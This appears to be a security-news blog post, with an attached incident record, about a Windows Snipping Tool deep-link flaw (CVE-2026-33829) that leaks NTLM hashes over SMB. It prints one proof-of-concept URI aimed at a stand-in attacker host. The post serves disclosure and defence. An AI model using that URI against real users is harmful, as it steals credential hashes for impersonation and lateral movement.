• Home
  • cyber
  • Microsoft: Windows Snipping Tool Vulnerability Allows Attackers to Perform Network Spoofing
cyber Vulnerability

Microsoft: Windows Snipping Tool Vulnerability Allows Attackers to Perform Network Spoofing

Apr 14, 2026 2 min read
Microsoft: Windows Snipping Tool Vulnerability Allows Attackers to Perform Network Spoofing

Microsoft Snipping Tool Vulnerability Exposes NTLM Hashes via Deep Link Abuse

A newly disclosed vulnerability in Microsoft’s Snipping Tool, tracked as CVE-2026-33829, allows attackers to capture NTLM authentication hashes through network spoofing. Discovered by security researcher Margaruga of BlackArrowSec Red Team, the flaw exploits improper validation in the app’s ms-screensketch deep link protocol.

The vulnerability stems from the filePath parameter, which can force Windows to connect to a remote SMB share when a crafted URI is opened. This triggers an NTLM authentication attempt, leaking the user’s hashed credentials to an attacker-controlled server. Exploitation requires minimal user interaction such as clicking a malicious link or visiting a compromised webpage making it a potent vector for social engineering attacks.

BlackArrowSec demonstrated the attack using a URI like:

ms-screensketch:edit?&filePath=\\attacker.lab\image.png&isTemporary=false&saved=true&source=Toast

When executed, the Snipping Tool initiates an SMB connection, exposing the NTLM response. Attackers could disguise malicious links as legitimate files (e.g., company wallpapers or ID photos), tricking users into triggering the leak.

While the flaw does not grant direct system access, stolen NTLM hashes can enable impersonation, lateral movement, or privilege escalation in enterprise environments. Microsoft addressed the issue in its April 14, 2026, security update, following a disclosure on March 23, 2026. Technical details and a proof-of-concept were published by BlackArrowSec on April 15, 2026, with additional resources available in their GitHub advisory.

Source: https://cyberpress.org/windows-snipping-tool-vulnerability/

Microsoft Security Response Center cybersecurity rating report: https://www.rankiteo.com/company/microsoft-security-response-center

"id": "MIC1776342690",
"linkid": "microsoft-security-response-center",
"type": "Vulnerability",
"date": "4/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"
{'affected_entities': [{'customers_affected': 'Users of Microsoft Snipping '
                                              'Tool on Windows',
                        'industry': 'Software',
                        'location': 'Global',
                        'name': 'Microsoft',
                        'size': 'Enterprise',
                        'type': 'Technology Company'}],
 'attack_vector': 'Deep Link Abuse',
 'data_breach': {'data_exfiltration': 'Yes (to attacker-controlled server)',
                 'sensitivity_of_data': 'High',
                 'type_of_data_compromised': 'NTLM authentication hashes'},
 'date_detected': '2026-03-23',
 'date_publicly_disclosed': '2026-04-15',
 'date_resolved': '2026-04-14',
 'description': 'A newly disclosed vulnerability in Microsoft’s Snipping Tool, '
                'tracked as CVE-2026-33829, allows attackers to capture NTLM '
                'authentication hashes through network spoofing. The flaw '
                'exploits improper validation in the app’s `ms-screensketch` '
                'deep link protocol, forcing Windows to connect to a remote '
                'SMB share when a crafted URI is opened, leaking the user’s '
                'hashed credentials to an attacker-controlled server.',
 'impact': {'data_compromised': 'NTLM authentication hashes',
            'identity_theft_risk': 'High (if NTLM hashes are cracked)',
            'operational_impact': 'Potential for impersonation, lateral '
                                  'movement, or privilege escalation',
            'systems_affected': 'Windows systems with Microsoft Snipping Tool'},
 'investigation_status': 'Resolved',
 'lessons_learned': 'Improper validation in deep link protocols can lead to '
                    'credential leakage. User awareness of social engineering '
                    'risks is critical.',
 'post_incident_analysis': {'corrective_actions': 'Patch released to validate '
                                                  'deep link parameters and '
                                                  'prevent unauthorized SMB '
                                                  'connections',
                            'root_causes': 'Improper validation of the '
                                           '`filePath` parameter in the '
                                           '`ms-screensketch` deep link '
                                           'protocol'},
 'recommendations': 'Apply Microsoft’s April 2026 security update immediately. '
                    'Educate users on recognizing malicious links. Monitor for '
                    'unusual SMB traffic.',
 'references': [{'date_accessed': '2026-04-15',
                 'source': 'BlackArrowSec GitHub Advisory',
                 'url': 'https://github.com/BlackArrowSec/redteam-research'}],
 'response': {'containment_measures': 'Security update released',
              'remediation_measures': 'Patch issued in April 14, 2026 security '
                                      'update'},
 'title': 'Microsoft Snipping Tool Vulnerability Exposes NTLM Hashes via Deep '
          'Link Abuse',
 'type': 'Information Disclosure',
 'vulnerability_exploited': 'CVE-2026-33829'}
Published by
Jeremy C
Jeremy C
You might also like
Great! Next, complete checkout for full access to Rankiteo Blog.
Welcome back! You've successfully signed in.
You've successfully subscribed to Rankiteo Blog.
Success! Your account is fully activated, you now have access to all content.
Success! Your billing info has been updated.
Your billing was not updated.